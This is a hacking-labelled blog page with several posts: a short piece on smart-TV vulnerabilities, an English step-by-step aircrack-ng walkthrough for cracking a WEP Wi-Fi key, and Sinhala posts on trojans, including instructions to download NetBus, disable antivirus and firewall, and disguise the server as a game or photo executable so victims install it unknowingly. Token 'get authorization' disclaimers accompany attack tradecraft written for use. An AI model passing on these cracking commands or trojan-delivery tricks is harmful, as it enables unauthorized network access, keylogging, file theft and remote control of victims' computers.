Showing posts with label Hacking. Show all posts
Showing posts with label Hacking. Show all posts

Thursday, April 19, 2012

Security Vulnerability of Digital Television (DTV)

TV is a dominant equipment of every household in this planet. The newest trend in Television is Digital Television (DTV). With this change the television will be a hyper connected with internet. I have described about digital television in another post in detail. You can read that post here.
Its said that 100 million TVs will be connected to internet by 2016. This will open up a total new market and more other benefits. Other than that in the same time it will discover vast number of targets for hackers.
Internet connected TVs uses IP addresses (Internet Protocol) and they will be connected to internet almost every time the TV is on. So the network interfaces of these televisions will be always connected to internet.
Spoiler alerts says
"Our goal was to see if we could hack into the set-top box, steal customer personal information, pirate services, and incur denial-of-service conditions. Just for yucks, I added two more objectives: to see if we could steal porn (typically, one of the biggest revenue streams for cable companies) or force porn onto another television that was watching Disney content, with the idea that offended customers would drop their service."
So what we can do is avoiding internet connected television but prevent doing transactions over internet connected television and be more conscious about what we are watching. Obviously television producers will come up with security options to prevent these vulnerabilities yet hackers will always find a way.

Tuesday, April 17, 2012

Hack a Wi-Fi Network’s WEP Password with Linux

I started my internship program this month so I don't find much time to spend writing long articles. So I thought to show how to crack a Wi- Fi Network's WEP password. Again I must say at the beginning that I show this for educational purposes. So if you hack someones Wi-Fi network with this please take their written authority. And do on your own risk :)

This hack only works for WEP passwords. So the victim should have used WEP in their Wi-Fi network. For other authentication methods like WPA or WPA2 are also breakable. There are tools out there to hack WPA2 authentication also but that takes time and long process than this I will consider posting an article on that later. So lets see how to do the hack.

Do do this hack in the way I am going to describe you have to have Linux operating system. I would recommend you to have Ubuntu. Specialty with Ubuntu is its more user frendly and the terminal commands I will give will work on Ubuntu (commands like apt-get may change in other Linux distributions). And I take the assumption that you are familiar with Linux operating systems. (If you find any difficulty please ask)

Below are the steps:-
Use terminal and grant user super user or administrator rights. User can get it with su command or sudo bash command

1. Install Aircrack-ng (This is the tool used to crack the wifi. This tool does not come with Ubuntu hence you have to install it on terminal)
        apt-get install aircrack-ng   (Update Ubuntu before you use this command
apt-get update.)

2. Run the following to get a list of your network interfaces.
     airmon-ng

3. Stop running Wireless interfaces.
     airmon-ng stop (interface)
     ifconfig (interface) down (We stop running wireless interface to change the MAC address of the interface)

4. Change the MAC Address of the wireless interface.
     macchanger --mac 00:11:22:33:44:55 (interface) (You can add any MAC address here.We change the MAC address for security reasons this step is recommended but not essential)

5. Start monitoring the packets.
     airmon-ng start (interface)

6. Dumps the packets. (You have to keep running the result of previous command and for this command open new terminal.We have to dump packets into a file so we can use that file when cracking the password)
     airodump-ng -c (channel) -b (bssid) -w (file name) (interface) (Channel and BSSID can be taken from the result of airmon-ng start (interface) command)

7. Creating Traffic (You have to keep running previous two terminals and open a new terminal and use following command to boost up the traffic. This is useful when you have only one station to communicate with the router. This boost up the traffic so it will capture more data).
         aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (interface)

8. Replay attack to fast the hack. (Open a new terminal for this command. This command is also for boosing up the hack with ARP requests)
         aireplay-ng -2 -p 0841 -c (dmac) -b (bssid) (interface)

9. Wait till Data section exceed at least 10,000 (number of data gathering change according to the size of the WEP key) in airmon-ng terminal and then hack for the key with following command.
     aircrack-ng -b (bssid) (file name-01.cap)

After executing this command you will get the WEP password of thevictim Wi-Fi network.

Enjoy!!!

Saturday, October 1, 2011

ට්‍රෝජන් අශ්වයෙක් පරිඝනකයකට දක්කන්න!!


මේ ලිපියෙන් මම අද කියන්න යන්නෙ කොහොමද ට්‍රෝජන් අශ්වයෙක් වෙනත් පරිඝනකයකට යවල. ඒ ට්‍රෝජන් අශ්වය ලවා අදාල පරිඝනකත් එක්ක සෙල්ලම් කරන්නෙ කියල. ට්‍රෝජන් අශ්වයන්ගෙ ක්‍රියා කාරීත්වය ගැන මම සවිතරාත්මක ලිපියක් කලින් ලියපු නිසා මේ ලිපියෙන් මම ඒ ගැන කියන්න යන්නෙ නෑ. කියවපු නැති කෙනෙක් ඉන්නවනම් මෙතනින් ගිහින් ඒකත් කියවලම එන්න.

මම පහුගිය ලිපියෙන් පැහැදිලි කළා අපිට පහසුවෙන් භාවිත කරන්න පුළුවන් ට්‍රෝජන් අශ්ව මෘදුකාංග තියෙනවා කියන එක. මම ඒ වගේ මෘදුකාංග කීපයක නම් පහතින් සඳහන් කරන්නම්,
  • Tini
  • Netcat
  • SubSeven
  • Back Orifice 2000
  • NetBus
මෙතන තියෙන මෘදුකාංග වලින් NetBus කියන ට්‍රෝජන් අශ්වයා භාවිත කරන ආකාරය තමයි මම අද කියන්න යන්නෙ. ඊට කලින් අනිවාර්යයෙන් සඳහන් කරන්න ඕනි ට්‍රෝජන් අශ්වයෙක් වෙනත් අයෙකුගේ පරිඝනයකට හෝ පරිඝනක පද්ධතියට යවල හැක් කරන එක නීති විරෝදී කියන එක. ඒ නිසා ට්‍රෝජන් අශ්වයෙක් යවන්න කලින් ඒ පුද්ගලයා හෝ ආයතනය දැනුවත් කරල අනුමැතිය ලබා ගැනීම වැදගත්.

ඒ වගේම ඔබට ඔබේ පරිඝනකය හෝ පරිඝනක පද්ධතිය ට්‍රෝජන් අශ්ව ප්‍රහාර වලට මුහුණ දෙන්නෙ කොහොමද කියල දැන ගන්නත් ඒ වගේ ප්‍රහාරයක් කිරීමෙන් දැන ගන්න පුළුවන්.


මම මාතෘකාවට දක්කනව වගේ වචනයක් දැම්මට ට්‍රෝජන් අශ්වයන් යැවීම ප්‍රහාරයක් (Attack) හා යවන්නා ප්‍රහාරකයෙක් (Attacker) විදිහට තමයි සැලකෙන්නෙ. ඒ නිසා දැනුමට හා විනෝදයක් ලබන්න ප්‍රහාරය අනුමැතිය සහිතව (මේකත් ලිඛිත වන්න ඕනි) කරන්න කියල මම ඉල්ලා සිටිනවා. මොකද මෙයින් ලබා ගන්නා දැනුමකින් ඔබ කරන ක්‍රියා සම්බන්ධයෙන් වගකීමක් මට නැහැ.

බය කළා ඇතිනෙ, දැන් වැඩේට බහිමු. මම කලින් කිව්වා මම ඔබට පාවිච්චි කරන්න කියල දෙන්නෙ NetBus කියන ට්‍රෝජන් අශ්ව මෘදුකාංගය කියල. මේ මෘදුකාංගය ඉතාමත් ප්‍රසිද්ධ ට්‍රෝජන් අශ්ව මෘදුකාංගයක්. ඉස්සෙල්ලම මෘදුකාංගය මෙතනින් ගිහින් භාගත කරන්න. භාගත කරන්න කලින් ඉස්සෙල්ලම Virus Guard හා Fire Wall අක්‍රීය (Disable) කරන්න.


හැම ට්‍රෝජන් අශ්වයෙක් වගේම NetBus ටත් ප්‍රධාන කොටස් දෙකක් තියෙනවා. ඒ තමයි,
  1. Client
  2. Server
මෙතනින් සර්වර් ෆයිල් එක තමයි ට්‍රෝජන් අශ්වයාට ගොදුරු වෙනාගෙ පරිඝනකයේ ස්ථාපනය කරන්නෙ. Client එකෙන් තමයි අපි හැක් කරන්නෙ. හැක් කරන ආකාරය දැන ගන්න කලින් අපි බලමු නෙට්බසය පාවිච්චි කරල වෙනත් පරිඝනකයකට ඔබේ පරිඝනයකේ ඉඳන් මොනවාද කරන්න පුළුවන් කියලා,
  • CD/DVD-ROM ඇරීම හා වැසීම
  • BMP/JPG පින්තූර දිස් වීමට සැලැස්වීම
  • මූසිකයයේ (Mouse)බොත්තම් (Button) වල වම දකුණ මාරු කිරීම
  • වෙනත් වැඩසටහන් ආරම්භ කිරීම
  • WAV ගොනු ධාවනය කිරීම
  • මූසිකය පාලනය කිරීම
  • විවිධාකාරයේ පණිවුඩ දිස් වීමට සැලැස්වීම
  • වින්ඩෝස් මෙහෙයුම් පද්ධතිය (OS) වැසීම (Shut Down)
  • ගොනු(Files) Download/Upload/Delete කිරීම
  • Keystrokes යැවීම සහ යතුරු (Keys) අත්හිටුවීම (Disable)
  • විකල්ප URL එකකට යැවීම
  • Keystrokes ග්‍රහණය කර ගැනීම
  • Screendump ගැනීම
  • පරිඝනකයේ ශබ්දය අඩු වැඩි කිරීම
  • පරිඝනකයේ මයික්‍රෆෝනයෙන් ශබ්ද පටිගත කිරීම
වැනි විවිධාකාර දේවල් රාශියක් NetBus ට්‍රෝජන් අශ්වයාට කරන්න පුළුවන්.

මෙය භාවිතයෙන් හැක් කිරීමේදී වඩාත් වැදගත් වෙන්නෙ ඔබේ ගොදුරට (Victim) සර්වර් ෆයිල් එක ඔහුගේ පරිඝනකය තුල ස්ථාපනය කර වීමයි. ඔබ අද්‍යාපනික අරමුණකින් කරනවානම් ගොදුරගෙ අනුමැතිය ඇතුවම මේක ස්තාපනය කරන්න පුලුවන් බොහොම ලේසියෙන් නමුත් හැක් කරනකොට එහෙම අනුමැතිය ලැබෙන්නෙ නෑ. ඉතින් මේ සඳහා හැකර්ලා විවිධ ආකාර පාවිච්චි කරනවා. ඔබගේ දැන ගැනීමට මම ඒ ආකරයක් දෙකක් පැහැදිලි කරන්නම්.

අපිට පුළුවන් මේ ට්‍රෝජන් අශ්වයා වෙනත් නමකින් නම් කරන්න. ඒ කියන්නෙ දකින්නාට හිතෙනවා මේක වෙන දෙයක් කියල. උදාහරණයකට අපිට පුළුවන් ඒක Beauty_of_Sri_Lanka.exe වගේ නමකින් නම් කරන්න. දැක්කම අපිට හිතෙනවා මේක මොකක් හරි ලංකාවෙ සොබා දම වගේ දෙයක් ගැන අදාල මොකක් හරි කියල. එහෙම හිතල ඒක ධාවනය කරනවා. එතකොට කිසිම දෙයක් වුන බවක් ගොදුරට පෙනෙන්නෙ. නමුත් ඔහු ඒක ධාවනය කරපු ගමන් ඔහුට නොපෙනී ට්‍රෝජන් අශ්වයා පරිඝනකය තුල ස්තාපනය වෙනවා. එක්කො මේක ගේම් එකක් විදිහට නම් කරන්න පුළුවන් Bubble.exe හෝ PacMan.exe වගේ. මෙතනදි අපි බලාපොරොත්තු වෙන්නෙ ඉහල අවස්ථාවෙ වගේම හොඳ ගේම් එකක් නමුත් ධාවනය කරපුවාම කිසිම දෙයක් වෙන්නෙ නෑ ඉතින් අපිත් දෙතුන් සැරයක් රන් කරල අතෑරල දානවා නමුත් අපිට නොපෙනීම අපි විසින්ම ට්‍රෝජන් අශ්වයා අපේ පරිඝනකයට රිංගලා. ඒකයි මේකට ට්‍රෝජන් අශ්වයා කියන්නෙ මම ඒ ගැන කලින් ලිපියෙ කිව්වා. මේ විදිහට කී සැරයක් ඔයාලත් රන් කරපුහාම මොකවත් නොවුන ෆයිල් රන් කරලා තියෙනවාද?


ඒ වගේම හැකර්ලා තවත් ආකාරයක් භාවිතා කරනවා. ඒ තමයි Wrapper එකක් අනුසාරයෙන් ට්‍රෝජන් අශ්වයා ඇත්තටම වැඩ කරන වැඩසටහනකට එතීම. උදාහරණයක් විදිහට ඇත්තටම වැඩ කරන හැමෝම ආස චෙස් ගේම් එකක් තියෙනවා Chess.exe කියලා. ඒකෙ ගොනුවේ ප්‍රමාණය (File Size) 500KB කියල හිතමුකො. හැකර් කරන්නෙ Wrapper වැඩසටහනක් ආධාරයෙන් ට්‍රෝජන් අශ්වයාවත් (මෙයත් exe ෆයිල් එකක්ම තමයි) Chess.exe එකටම එතීම හෙවත් සැඟවීම එතකොට ෆයිල් එක 600KB විතර වෙනවා. එතකොට ඔබ අර ගේම් එක ස්තාපනය කරපුවාම ඇත්තටම ගේම් එක ස්තාපනය වෙනවා (ඒක අපිට සෙල්ලම් කරන්නත් පුළුවන්) ඒත් එක්කම ඒකෙ හංගල එවපු ට්‍රෝජන් අශ්වයාත් ස්තාපනය වෙනවා. කොටින්ම අපි එක exe ෆයිල් එකක් රන් (Run) කරනකොට ඇත්තටම දෙකක් රන් වෙලා. ඇත්තටම ට්‍රෝජන් අශ්වයා කියන්නෙ වෙනත් වේශයකින් එන පහරදීමක්. අපිම තමයි නොදැනුවත්ව පහර දීම පාවඩ දාල පිලිගන්නෙත්. ඇත්තටම අර තුසර පුර සංග්‍රාමයේදි උනා වගේ.

මෙහෙම ස්තාපනය උන ගොදුරු පරිඝනකය අන්තර්ජාලයට හෝ LAN එකට සම්බන්ද උන ගමන් පහර දෙන්නාට පුළුවන් අර උඩ තියෙන වින්ඩෝව් එකෙ තියෙන දේවල් කරන්න. ඒවා කරන ආකාරය හොඳට පෙන්වන වීඩියෝවක් මට හම්බ උනා. ඒකෙන් බලල ඉතිරි ටික කර ගන්න එක කජු කනව වගේ තමයි. මම ඔයාලට දුන්න NetBus ට්‍රෝජන් අශ්වයා හොඳට වැඩ. මම මේක ලියන්න කලියෙන් ඒක මගේ ගෙදර තියෙන LAN එකට සම්බන්ධ අනිත් පරිඝනකයකට දාල ටෙස්ට් කලා. මම ආසම CD-ROM වැඩේට ඒක හරිම අත්බූත බවක් දෙනව නිකන්ම එක ඇරෙන වැහෙන එක. ඔය යටින් තියෙන වීඩියෝව බලල ඉතුරු හරිය කරන්න.



මේ ලිපියේ අඩංගු සියලුම කරුණූ අධ්‍යාපනික අරමුණකින් ප්‍රදර්ශනය සඳහා පමණක් පල කළ ඒවා බව සලකන්න.

All content of this post are only for demonstration purpose and do not try this without a proper authorization document form the potential victim.

පරිඝනකයට පනින ට්‍රෝජන් අශ්වයෝ!!

ට්‍රෝජන් අශ්වයෙක් (Trojan Horse) කියන්නෙ ඔබේ අනුමැතිය නොමැතිව හෝ ඔබ නොදැන ඔබේ පරිඝනකය තුල ක්‍රියාත්මක වන මෘදුකාංගයක්. මෙහි විශේෂත්වය තමයි මෙය ඔබේ පරිඝනකයට හදුන්වා දෙන්නෙ එහි ඇත්ත තත්වය සඟවල. උදාහරණයක් විදිහට ඔබට වෙබ් අඩවියකින් නොමිලයේ ලස්සන ස්ක්‍රීන් සර්වරයක් (Screen Server) ලබා දෙනවා. ඔබ එය බාගත කරගෙන ස්තාපනය කරගන්නවා. පිටතින් එය ලස්සන ස්ක්‍රීන් සර්වරයක් උනාට එය ඇතුලත පවතින්නෙ විනාශකාරී මෘදුකාංගයක්.


ට්‍රෝජන් අශ්වයා කියන විශේෂිත නාමය මෙයට ලැබිල තියෙන්නෙත් ඒ නිසාමයි. ග්‍රීක මහා කවි හෝමර් විසින් ලියනු ලැබූ තුසරපුර සංග්‍රාමයේ එන සිදුවීමක් තමයි විශාල දැව අශ්වයෙක් ඇතුලෙ සෙබලු සඟවල සතුරු නගරයට යවපු එක. සතුරු නගර වැසියෝ කලේ එය තෑග්ගක් විදිහට සලකල වසර දහයකට ආසන්න කාලයක් පැවති සංග්‍රාමයෙන් ඔවුන්ව ආරක්ශා කරපු විශාල පවුර බිඳ දමල අර ඇතුලෙ හංගල හිටිය සෙබලුත් එක්කම ලී අශ්වය නගරය ඇතුලට ගත්ත එක. ඊට පස්සෙ උන දේ අමුතුවෙන් කියන්න ඕනි නෑනෙ. ඕකට අපේ සමාජයේ කතාවක් තියෙනවා "අහක යන නයි රෙද්ද අස්සෙ දාගෙන කෑවෝ කෑවෝ කියල කෑගහනවා" කියල. මම මෙහෙම කෙටියෙන් කිව්වට මේ ග්‍රීක කතන්දරය ඉතාමත් දිග ලස්සන කතාවක් එහිම පසු කතාව වන ඔඩිසියස් කියන කතාවත් හරිම ලස්සනයි. දෙකම සිංහලට පරිවර්තනය වෙලා තියෙනවා.

ට්‍රෝජන් අශ්වයෙක් පරිඝනකයට විවිද අරමුණු මුල් කරගෙන හදුන්වා දෙනු ලබන්න පුළුවන්. ප්‍රධාන වශයෙන් ට්‍රෝජන් අශ්වයන් හදුන්වා දෙනු ලබන්නෙ තොරතුරු සොරා ගැනීමට හෝ පරිඝනකය විනාශ කිරීම සඳහායි.

ට්‍රෝජන් අශ්වයෙක් පිටුපස සෑම විටම පහර දෙන්නෙක් සිටිනවා. ට්‍රෝජන් අශ්වයා සහිත පරිඝනකය අන්තර්ජාල සම්බන්දතාවය ලබා ගත්ත ගමන්ම පහර දෙන්නාට ඔහුගේ පහර දීම කරන්න අවශ්‍ය ඉඩකඩ සෑදෙනවා.

ට්‍රෝජන් අශ්ව ප්‍රභේද :-
  • මුරපද ග්‍රහණය/යැවීම (Password Sending/Capturing)
  • FTP Trojans
  • Key Stroke Captures (මෙමගින් යතුරු පුවරුවේ ලියනය කරන හැම අකුරක්/සංකේතයක්ම ග්‍රහණය කර ගන්නවා)
  • විනාශකාරී ට්‍රෝජන් අශ්වයන්
  • Denial of Service (DoS)
  • Proxy/MITM (Man In The Middle Attack) Trojans
  • දුරස්ත ඇතුල්වීම් ට්‍රෝජන් අශ්වයන් (Remote Access)
  • Software Detection Killers
මෙතන සමහර දේවල් මේක කියවන සමහර අය නොදන්නවා වෙන්න පුලුවන් නමුත් මේවා දීර්ඝව විස්තර කරන්න ඕනි. ඒ වගේම මේ හා සම්බන්ද දේවල් වෙන Wrappers, Sniffers, Spoofing, Man in the Middle Attack යන ඒවාත් වෙනම විස්තර කරන්න ඕනි. මේවා මම පසුව ඉඩ ඇති හැටියට ලියන්න හිතාගෙන හිටියත් ඔබට වැදගත් කියල හිතනවනම් මට කියන්න මම ඒවාත් විස්තර කරල වෙනම ලිපි ලියන්නම්.

ට්‍රෝජන් අශ්වයන් හදුන්වාදෙනු ලබන ආකාර :-
  • චැට් හරහා (Chat Clients) - Skype, AIM, Yahoo, Facebook Chat, Google Chat, ICQ, IRC, MSN, Trillian
  • e-Mail පණිවුඩ වලට අමුණලා (Email Attachments)
  • භෞතිකව පරිඝනක පද්ධතියට ඇතුල්වීමෙන්
  • අන්තර්ජාල සෙවුම් මෘදුකාංග (Browser) සහ e-Mail මෘදුකාංග වල දුර්වලතා (Bugs) උපයෝගයෙන් (x-site scripting)
  • ගොනු හුවමාරුව (File Sharing) - සව්‍යංක්‍රීයව (Autorun) ක්‍රියාත්මක වෙන ට්‍රෝජන් අශ්වයන් Flash Drives හා CD/DVD තුලට ඇතුලත් කිරීම
  • Wrappers (වෙනත් වැඩ සටහන් වල සඟවා හෙවත් ඔතා එවීම)
  • P2P සහ වෙනත් Freeware අඩවි හරහා
  • News Groups - News Group අඩවියක ඇමුණුමක් සමඟ (ට්‍රෝජන් අශ්වයෙක් අමුණා) ප්‍රවෘත්ති ලිපි පල කිරීමෙන්
  • අනාරක්ශිත වෙබ් අඩවි හරහා බාගත කිරීමෙන්
මේ හදුන්වා දෙන ආකාර පිළිබද දැනුවත් වීමෙන් ට්‍රෝජන් අශ්වයන් ඔබේ පරිඝනකයට පැනීමෙන් වලක්ව ගන්න පුලුවන්.

පොදු වශයෙන් ට්‍රෝජන් අශ්වයන් භාවිතා වෙන ආකාර:-
  • පරිඝනකයක CD-Rom එක විවෘත කිරීම
  • පරිඝනකයේ Screenshot ගැනීම
  • Key Strokes ග්‍රහනය සහ ඒවා පහර දෙන්නාට යැවීම
  • පරිඝනකයේ සියලුම ගොනු හා Drives වලට සම්පූර්ණ ඇතුලත් () වීමේ පහසුකම ලබා දීම.
  • ඔබේ පරිඝනකය වෙනත් හැකිං කියාවලියක් සඳහා පාලමක් ලෙස භාවිතා කිරීම.
  • යතුරු පුවරුව හා මූසිකය ක්‍රියා වියහිත කිරීම.
ට්‍රෝජන් අශ්ව වැඩසටහන් වර්ග අපිට අන්තර්ජාලය තුලින් ලබාගෙන පාවිච්චි කරන්න පුලුවන්. එහෙම ට්‍රෝජන් අශ්වයෙක් යවන ආකාරය ගැන මම වෙනත් ලිපියකින් ලියන්නම්.

ප. ලි. මම දිනපතා ලිපි ලියන්නෙ නැති නිසා ට්‍රෝජන් අශ්වයෙක් වෙන කෙනෙක්ගෙ පරිඝනකයට පන්නන්න ඉක්මනටම දැන ගන්න ඕනිනම් ඒක මට කියන්න මම ඉක්මනටම ඒ ගැන ලියන්නම්.